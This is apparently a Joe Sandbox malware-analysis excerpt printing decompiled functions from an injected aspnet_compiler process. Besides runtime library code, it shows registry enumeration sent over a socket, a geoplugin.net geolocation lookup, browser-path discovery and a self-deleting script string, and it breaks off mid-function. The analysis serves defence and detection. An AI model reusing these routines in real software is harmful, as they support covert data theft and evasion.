                0x0045560a
                0x0045559e
                0x00000000
                0x0045559e
                0x0045557d
                0x0045557f
                0x00000000
                0x00000000
                0x00000000
                0x0045557f
                0x00455545
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free
                • String ID: EDE$EDE
                • API String ID: 269201875-1143427775
                • Opcode ID: 6c78bc0ecd021690797f9600b798c5c744d82ef1b2dec448d1b2b23438ea67aa
                • Instruction ID: 88694d13a6d820189563449504a694bd1f50df3e673083fec4fd5d227810db4a
                • Opcode Fuzzy Hash: 6c78bc0ecd021690797f9600b798c5c744d82ef1b2dec448d1b2b23438ea67aa
                • Instruction Fuzzy Hash: 83415B31A00944BBEB206BBA8C52A7F3BA5DF45335F24051FFC18C22D3E67C8809566E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00449C3C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 73%
                			E00449C3C(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x46f00c; // 0xd60a1515
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x470810 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x470810 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00444451(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x470810 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x470810 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x470810 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E004486A2( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E004486A2();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E004338BB(_v8 ^ _t136);
			}


































                0x00449c44
                0x00449c4b
                0x00449c4e
                0x00449c56
                0x00449c5a
                0x00449c66
                0x00449c69
                0x00449c6c
                0x00449c73
                0x00449c7b
                0x00449c7e
                0x00449c84
                0x00449c8a
                0x00449c8f
                0x00449c91
                0x00449c94
                0x00449c99
                0x00449ca3
                0x00449caa
                0x00449cad
                0x00449cb4
                0x00449cbb
                0x00449ce7
                0x00449d0d
                0x00449d0f
                0x00000000
                0x00449ce9
                0x00449cec
                0x00449db3
                0x00449dbf
                0x00449dca
                0x00449dcf
                0x00449cf2
                0x00449cf9
                0x00449cfe
                0x00449d04
                0x00449d0a
                0x00000000
                0x00449d0a
                0x00449d04
                0x00449cec
                0x00449cbd
                0x00449cc1
                0x00449cc4
                0x00449cca
                0x00449ccc
                0x00449ccf
                0x00449cd3
                0x00449d10
                0x00449d13
                0x00449d14
                0x00449d19
                0x00449d1f
                0x00449d25
                0x00449d34
                0x00449d3a
                0x00449d40
                0x00449d45
                0x00449d61
                0x00449dd4
                0x00449dda
                0x00449d63
                0x00449d6b
                0x00449d74
                0x00449d7a
                0x00000000
                0x00449d7c
                0x00449d7e
                0x00449d81
                0x00449d9a
                0x00000000
                0x00449d9c
                0x00449da0
                0x00449da2
                0x00449da5
                0x00000000
                0x00449da5
                0x00449da0
                0x00449d9a
                0x00449d7a
                0x00449d74
                0x00449d61
                0x00449d45
                0x00449d1f
                0x00000000
                0x00449da8
                0x00449da8
                0x00449ddc
                0x00449dee

                APIs
                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A3B1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00449C7E
                • __fassign.LIBCMT ref: 00449CF9
                • __fassign.LIBCMT ref: 00449D14
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00449D3A
                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A3B1,00000000,?,?,?,?,?,?,?,?,?,0044A3B1,?), ref: 00449D59
                • WriteFile.KERNEL32(?,?,00000001,0044A3B1,00000000,?,?,?,?,?,?,?,?,?,0044A3B1,?), ref: 00449D92
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: 375b3492dfa092f37ad602e657ac1f80d9a3d9ae5f6776982733ad928ad8e07f
                • Instruction ID: 2d42c393ae315c603a8a69066ade60cad850b82c9b10e16282d480ace16cedcb
                • Opcode Fuzzy Hash: 375b3492dfa092f37ad602e657ac1f80d9a3d9ae5f6776982733ad928ad8e07f
                • Instruction Fuzzy Hash: 1D5181B1E00249AFEB10CFA8D885AEEBBF4EF09300F14416BE955E7291D6749D41CB69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00412FF5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E00412FF5(short* __ecx, char __edx, void* __eflags, char _a4) {
				void* _v16;
				char _v28;
				char _v52;
				void* _v56;
				char _v76;
				void* _v80;
				char _v100;
				void* _v104;
				char _v124;
				void* _v128;
				char _v148;
				void* _v152;
				char _v172;
				void* _v176;
				char _v196;
				void* _v200;
				char _v220;
				void* _v224;
				char _v225;
				void* _v228;
				void* _v248;
				void* _v268;
				void* __ebx;
				void* __ebp;
				void* _t28;
				void* _t35;
				void* _t36;
				void* _t61;
				short* _t116;
				void* _t120;
				void* _t123;
				void* _t124;

				_t103 = __edx;
				_t123 =  &_v228 - 0x18;
				_v225 = __edx;
				_t116 = __ecx;
				E004020D6(_t61, _t123, __edx, __eflags,  &_a4);
				_t28 = E00412F64(_t61, __eflags);
				_t124 = _t123 + 0x18;
				_t62 = 0;
				if(RegOpenKeyExW(_t28, _t116, 0, 0x20019,  &_v228) != 0) {
					E00402073(0, _t124 - 0x18, _t103, _t120, "3");
					_push(0x72);
					E00404A81(0x473450, _t103, __eflags);
				} else {
					E00412D3D(_v224, _t103);
					_t35 = E0041A879(0,  &_v28, 0x473420);
					_t36 = E0041A879(0x473408,  &_v52, 0x473408);
					_t129 = _v225;
					_t107 =  ==  ? "0" : "1";
					_t114 = E00402EF0(0x473408,  &_v220, E00402EF0(0x473408,  &_v196, E00402EF0(0x473408,  &_v172, E00402E81( &_v148, E00402EF0(0x473408,  &_v124, E00402E81( &_v100, E004052FE( &_v76,  ==  ? "0" : "1", 0x473420, 0x472ec8), _t36), 0x473420, _v225, 0x472ec8), _t35), 0x473420, _v225, 0x472ec8), 0x473420, _v225, 0x473438), 0x473420, _t129, 0x472ec8);
					E00402EF0(0x473408, _t124 - 0x18, _t44, 0x473420, _t129, 0x4734d0);
					_push(0x71);
					E00404A81(0x473450, _t44, _t129);
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					L004086CB(0x473408, 0x473420, _t44, 0x46a8f0);
					L004086CB(0x473408, 0x473408, _t114, 0x46a8f0);
					L00405A86(0x473408, 0x473438, _t114, 0x464074);
					L00405A86(0x473408, 0x4734d0, _t114, 0x464074);
					RegCloseKey(_v268);
					_t62 = 1;
				}
				E00401FB8();
				return _t62;
			}



































                0x00412ff5
                0x00412fff
                0x00413002
                0x00413006
                0x00413012
                0x00413017
                0x0041301c
                0x00413023
                0x00413036
                0x004131b0
                0x004131b5
                0x004131bc
                0x0041303c
                0x00413040
                0x00413069
                0x0041307e
                0x00413083
                0x0041309b
                0x004130f5
                0x004130f9
                0x004130ff
                0x00413106
                0x0041310f
                0x00413118
                0x00413121
                0x0041312a
                0x00413133
                0x0041313f
                0x0041314b
                0x00413157
                0x00413163
                0x00413170
                0x00413178
                0x00413188
                0x00413193
                0x0041319c
                0x004131a2
                0x004131a2
                0x004131c8
                0x004131d9

                APIs
                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 0041302E
                  • Part of subcall function 00412D3D: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00412DA4
                  • Part of subcall function 00412D3D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00412DD3
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                • RegCloseKey.ADVAPI32(00000000,00464074,00464074,0046A8F0,0046A8F0,00000071), ref: 0041319C
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseEnumInfoOpenQuerysend
                • String ID: 4G$84G$P4G$P4G
                • API String ID: 3114080316-1145574035
                • Opcode ID: 0d5f97a4e4b972ea6f85d59d31702cef07beda235a800e8b333b0ba132068f3f
                • Instruction ID: fd6b18073abc04bee90befd91301638a83fdde0089edac9dbf0f47121c2ff828
                • Opcode Fuzzy Hash: 0d5f97a4e4b972ea6f85d59d31702cef07beda235a800e8b333b0ba132068f3f
                • Instruction Fuzzy Hash: 6841F6316442005BC318FB65D992AEFB3989FD0348F40893FF149631D2EF7C5A0A969E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041A1E5 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E0041A1E5(void* __ecx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t23;
				intOrPtr* _t25;
				intOrPtr* _t27;
				void* _t34;
				void* _t43;
				char* _t50;
				void* _t57;
				void* _t60;
				void* _t61;
				void* _t65;

				_t65 = __eflags;
				_t34 = __ecx;
				E00412903(__ecx, 0x80000000, L"http\\shell\\open\\command", 0);
				E004440A5(E00401EE4(_t34));
				E00401EF3(_t34, 0x80000000, _t57, E00408682(_t34,  &_v44, 0, E0041B7DE(_t34, L".exe") + 4));
				E00401EE9();
				_t43 = _t61 - 0x18;
				E004086D0(_t34, _t43, 0x80000000, _t65, _t34);
				_push(_t43);
				E00401EF3(_t34, 0x80000000, _t57, E0041A89D( &_v44, 0x80000000));
				E00401EE9();
				_t23 = E004022E5(_t34,  &_v8);
				_t25 = E004022AA(_t34,  &_v12);
				_t7 =  &_v16; // 0x40eb54
				_t27 = E004022E5(_t34, _t7);
				_t50 =  &_v20;
				E00409291(_t50,  *_t27,  *_t25,  *_t23);
				if(E0041AB12(_t50) != 0) {
					_push(_t50);
					_t56 = L"program files\\";
					_t59 = E0041B7DE(_t34, L"program files\\");
					if(_t31 != 0xffffffff) {
						E0041B84F(_t34, _t34, 0x80000000, _t56, _t60, _t59, E0043A3D6(L"program files\\"), L"program files (x86)\\");
					}
				}
				return _t34;
			}






















                0x0041a1e5
                0x0041a1fa
                0x0041a1fc
                0x0041a20b
                0x0041a230
                0x0041a238
                0x0041a240
                0x0041a243
                0x0041a248
                0x0041a257
                0x0041a25f
                0x0041a26a
                0x0041a277
                0x0041a280
                0x0041a284
                0x0041a28b
                0x0041a292
                0x0041a2a1
                0x0041a2a3
                0x0041a2a4
                0x0041a2b1
                0x0041a2b6
                0x0041a2c8
                0x0041a2c8
                0x0041a2b6
                0x0041a2d5

                APIs
                  • Part of subcall function 00412903: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,00473298), ref: 00412925
                  • Part of subcall function 00412903: RegQueryValueExW.ADVAPI32(?,0@,00000000,00000000,?,00000400), ref: 00412944
                  • Part of subcall function 00412903: RegCloseKey.ADVAPI32(?), ref: 0041294D
                  • Part of subcall function 0041AB12: GetCurrentProcess.KERNEL32(?,?,?,0040CFAE,WinDir,00000000,00000000), ref: 0041AB23
                • _wcslen.LIBCMT ref: 0041A2BE
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                • String ID: .exe$T@$http\shell\open\command$program files (x86)\$program files\
                • API String ID: 37874593-902212947
                • Opcode ID: eea2cf22a4efe82d17c19541fbdbba51614aa04f7c4649b811df4b5a21ef61cf
                • Instruction ID: 21aed5fb5d72de47c87afb81655524ea1d35e8d6521c3cb27bca8a170edf9ba1
                • Opcode Fuzzy Hash: eea2cf22a4efe82d17c19541fbdbba51614aa04f7c4649b811df4b5a21ef61cf
                • Instruction Fuzzy Hash: 0E218871B001042BDB04BAB69C96EEE32AD9B44318F14057FF806B72C2ED7D9D5947AD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00455453 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 90%
                			E00455453(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				void* __esi;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						E00446E61(_t29, _t39, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E00444A38(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									E0043EE77(GetLastError());
								}
							}
							E00445002(_t40);
							_t14 = _t35;
						} else {
							E0043EE77(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(E0043EEAD())) = 0x16;
						E0043A5BB();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(E0043EEAD())) = 0x16;
				E0043A5BB();
				return 0;
			}
















                0x00455458
                0x0045545d
                0x00455477
                0x0045547a
                0x0045547c
                0x00455495
                0x00455497
                0x0045549e
                0x004554a0
                0x004554a9
                0x004554aa
                0x004554ae
                0x004554b4
                0x004554b7
                0x004554b9
                0x004554d3
                0x004554d6
                0x004554d8
                0x004554e5
                0x004554eb
                0x004554ed
                0x00455501
                0x00455503
                0x00455507
                0x00455507
                0x00455508
                0x004554ef
                0x004554f6
                0x004554fb
                0x004554ed
                0x0045550b
                0x00455510
                0x004554bb
                0x004554c2
                0x004554c7
                0x004554c7
                0x0045547e
                0x00455483
                0x00455489
                0x0045548e
                0x0045548e
                0x00000000
                0x00455515
                0x00455464
                0x0045546a
                0x00000000

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 21f379037bd41000b1dec86829ff5a907d8c929fa96bc8a1dddedb872b7e1145
                • Instruction ID: 243b992db74428a8b8f40e07f5805634c7787d5acd7d10a8c2111fadf3c51f9b
                • Opcode Fuzzy Hash: 21f379037bd41000b1dec86829ff5a907d8c929fa96bc8a1dddedb872b7e1145
                • Instruction Fuzzy Hash: A6112731505605BBDB102F779C0597B3BA9EF86336B11066AFC11C7252EA38C8459269
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00419EDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E00419EDB(void* __ecx, void* __edx) {
				WCHAR* _v36;
				long _v80;
				char _v88;
				int _v92;
				intOrPtr _v96;
				void* _v100;
				int _v104;
				intOrPtr _v108;
				void* __ebx;
				void* __ebp;
				int _t16;
				void* _t24;
				intOrPtr _t27;
				void* _t32;
				void* _t33;
				void* _t35;
				void* _t37;

				_t32 = __edx;
				_t25 = __ecx;
				_t24 = __ecx;
				E004020BF(__ecx, __ecx);
				_push(0xffff);
				_v36 = 0;
				_t33 = E0043A620(_t25);
				_t37 = InternetOpenW(0, 1, 0, 0, 0);
				_t35 = InternetOpenUrlW(_t37, L"http://geoplugin.net/json.gp", 0, 0, 0x80000000, 0);
				do {
					_v80 = _v80 & 0x00000000;
					_t16 = InternetReadFile(_t35, _t33, 0xffff,  &_v80);
					_t27 = _v96;
					_v92 = _t16;
					_t40 = _t27;
					if(_t27 != 0) {
						L00403356(E00402097(_t24,  &_v88, _t32, _t37, _t40, _t33, _t27));
						E00401FB8();
						_t27 = _v108;
						_t16 = _v104;
					}
				} while (_t16 == 1 && _t27 != 0);
				InternetCloseHandle(_t35);
				InternetCloseHandle(_t37);
				L0043A61B(_t33);
				return _t24;
			}




















                0x00419edb
                0x00419edb
                0x00419ee2
                0x00419ee4
                0x00419eeb
                0x00419ef0
                0x00419f00
                0x00419f10
                0x00419f1e
                0x00419f20
                0x00419f20
                0x00419f31
                0x00419f37
                0x00419f3b
                0x00419f3f
                0x00419f41
                0x00419f51
                0x00419f5a
                0x00419f5f
                0x00419f63
                0x00419f63
                0x00419f67
                0x00419f77
                0x00419f7a
                0x00419f7d
                0x00419f8c

                APIs
                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419F02
                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 00419F18
                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 00419F31
                • InternetCloseHandle.WININET(00000000), ref: 00419F77
                • InternetCloseHandle.WININET(00000000), ref: 00419F7A
                Strings
                • http://geoplugin.net/json.gp, xrefs: 00419F12
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Internet$CloseHandleOpen$FileRead
                • String ID: http://geoplugin.net/json.gp
                • API String ID: 3121278467-91888290
                • Opcode ID: 2a2d18a2d1326e2a0acf09f31c35e5c691ed8eb435983273dc7f527a5ef05663
                • Instruction ID: a70ecc99465d7097496f885b09ad11ab3779813296453655fb12c4e4d745da0f
                • Opcode Fuzzy Hash: 2a2d18a2d1326e2a0acf09f31c35e5c691ed8eb435983273dc7f527a5ef05663
                • Instruction Fuzzy Hash: FD11C8311093127BD224AB169C49DBF7F9CEF86765F00043EF945E2291DB68DC45C6BA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041AD6A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0041AD6A(long __edx, WCHAR* _a4, long _a8) {
				long _v4;
				intOrPtr _t8;
				long _t9;
				struct _OVERLAPPED* _t19;
				void* _t20;
				long _t21;
				long _t23;
				void* _t24;
				void* _t25;

				_t1 =  &_a8; // 0x465028
				_t19 = 0;
				_t25 = _t20;
				_t23 = __edx;
				_t8 =  *_t1;
				if(_t8 == 0) {
					_t9 = 0x40000000;
					_t21 = 2;
				} else {
					if(_t8 != 1) {
						_t9 = _a8;
						_t21 = _a8;
					} else {
						_t9 = 4;
						_t21 = _t9;
					}
				}
				_t24 = CreateFileW(_a4, _t9, _t19, _t19, _t21, 0x80, _t19);
				if(_t24 != 0xffffffff) {
					if(_a8 != 1 || SetFilePointer(_t24, _t19, _t19, 2) != 0xffffffff) {
						if(WriteFile(_t24, _t25, _t23,  &_v4, _t19) != 0) {
							_t19 = 1;
						}
						CloseHandle(_t24);
						return _t19;
					} else {
						CloseHandle(_t24);
						goto L6;
					}
				} else {
					L6:
					return 0;
				}
			}












                0x0041ad6b
                0x0041ad72
                0x0041ad74
                0x0041ad77
                0x0041ad79
                0x0041ad7b
                0x0041ad95
                0x0041ad9a
                0x0041ad7d
                0x0041ad80
                0x0041ad89
                0x0041ad8d
                0x0041ad82
                0x0041ad84
                0x0041ad85
                0x0041ad85
                0x0041ad80
                0x0041adaf
                0x0041adb4
                0x0041adbf
                0x0041adeb
                0x0041aded
                0x0041aded
                0x0041adf0
                0x00000000
                0x0041add1
                0x0041add2
                0x00000000
                0x0041add2
                0x0041adb6
                0x0041adb6
                0x00000000
                0x0041adb6

                APIs
                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0046A8F0,00000000,00000000,0040C902,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041ADA9
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041ADC6
                • CloseHandle.KERNEL32(00000000), ref: 0041ADD2
                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041ADE3
                • CloseHandle.KERNEL32(00000000), ref: 0041ADF0
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$CloseHandle$CreatePointerWrite
                • String ID: (PF
                • API String ID: 1852769593-3961223099
                • Opcode ID: bf69a830dd746d7c6ae827066bb4a5dedd865cc1e8c81bdcf7b86caaf748b986
                • Instruction ID: 53714e6fa216203b7318fdbd75d04b9937c0d47cb555b8ec8e0bf6eb367397e8
                • Opcode Fuzzy Hash: bf69a830dd746d7c6ae827066bb4a5dedd865cc1e8c81bdcf7b86caaf748b986
                • Instruction Fuzzy Hash: CE110871206A117FE6104A24BC88EFB779EEB42367F10463AF552C26D0C634CC86563F
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044F77A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E0044F77A(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E0044F4C1(_t45, 7);
					E0044F4C1(_t45 + 0x1c, 7);
					E0044F4C1(_t45 + 0x38, 0xc);
					E0044F4C1(_t45 + 0x68, 0xc);
					E0044F4C1(_t45 + 0x98, 2);
					E00445002( *((intOrPtr*)(_t45 + 0xa0)));
					E00445002( *((intOrPtr*)(_t45 + 0xa4)));
					E00445002( *((intOrPtr*)(_t45 + 0xa8)));
					E0044F4C1(_t45 + 0xb4, 7);
					E0044F4C1(_t45 + 0xd0, 7);
					E0044F4C1(_t45 + 0xec, 0xc);
					E0044F4C1(_t45 + 0x11c, 0xc);
					E0044F4C1(_t45 + 0x14c, 2);
					E00445002( *((intOrPtr*)(_t45 + 0x154)));
					E00445002( *((intOrPtr*)(_t45 + 0x158)));
					E00445002( *((intOrPtr*)(_t45 + 0x15c)));
					return E00445002( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                0x0044f780
                0x0044f785
                0x0044f78e
                0x0044f799
                0x0044f7a4
                0x0044f7af
                0x0044f7bd
                0x0044f7c8
                0x0044f7d3
                0x0044f7de
                0x0044f7ec
                0x0044f7fa
                0x0044f80b
                0x0044f819
                0x0044f827
                0x0044f832
                0x0044f83d
                0x0044f848
                0x00000000
                0x0044f858
                0x0044f85d

                APIs
                  • Part of subcall function 0044F4C1: _free.LIBCMT ref: 0044F4EA
                • _free.LIBCMT ref: 0044F7C8
                  • Part of subcall function 00445002: HeapFree.KERNEL32(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                  • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                • _free.LIBCMT ref: 0044F7D3
                • _free.LIBCMT ref: 0044F7DE
                • _free.LIBCMT ref: 0044F832
                • _free.LIBCMT ref: 0044F83D
                • _free.LIBCMT ref: 0044F848
                • _free.LIBCMT ref: 0044F853
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                • Instruction ID: e20f7d93c4c1b7366c41c1c89a5bca39aa981d096f5eec7d46ef9b7b16274198
                • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                • Instruction Fuzzy Hash: C7117F71540B54AAEA30BBB2CC47FCF779C9F50708F81492FB39DA6052EA2CB5188794
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004106A6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E004106A6(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char _v24;
				intOrPtr _v36;
				intOrPtr* _t34;
				void* _t39;
				intOrPtr* _t42;
				intOrPtr* _t44;

				E00433BCB( &_v12, 0);
				_t39 =  *0x474a78;
				_v8 = _t39;
				_t42 = E0040D696(_a4, E0040D5C5(0x474c68));
				if(_t42 != 0) {
					L5:
					E00433C23( &_v12);
					return _t42;
				} else {
					if(_t39 == 0) {
						__eflags = E0041076A(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							_t34 =  &_v24;
							E0040D491(_t34);
							E004379F6( &_v24, 0x46cd4c);
							asm("int3");
							_push(_t42);
							_t44 = _t34;
							E0040D38B(_t34, _v36);
							 *_t44 = 0x4582f4;
							return _t44;
						} else {
							_t42 = _v8;
							 *0x474a78 = _t42;
							 *((intOrPtr*)( *_t42 + 4))();
